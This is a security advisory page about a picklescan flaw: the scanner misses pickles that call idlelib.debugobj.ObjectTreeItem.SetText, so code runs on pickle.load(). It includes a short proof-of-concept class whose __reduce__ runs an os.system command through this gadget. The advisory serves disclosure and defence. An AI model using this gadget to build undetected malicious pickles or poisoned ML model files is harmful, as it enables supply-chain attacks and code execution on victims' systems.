VYPR
Medium severityNVD Advisory· Published Aug 26, 2025· Updated Jun 24, 2026

Picklescan has a missing detection when calling built-in python idlelib.debugobj.ObjectTreeItem

CVE-2025-71354

Description

Summary

Using idlelib.debugobj.ObjectTreeItem.SetText, which is a built-in python library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to idlelib.debugobj.ObjectTreeItem.SetText function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

class EvilDebugobjSetText:
    def __reduce__(self):
        from idlelib.debugobj import ObjectTreeItem
        # ObjectTreeItem(..., setfunction=print).SetText(cmd)
        return ObjectTreeItem("label", None, print).SetText, ("__import__('os').system('whoami')",)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT https://github.com/Qhaoduoyu

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
picklescanPyPI
< 0.0.290.0.29

Affected products

1

Patches

Vulnerability mechanics

References

3

News mentions

0

No linked articles in our index yet.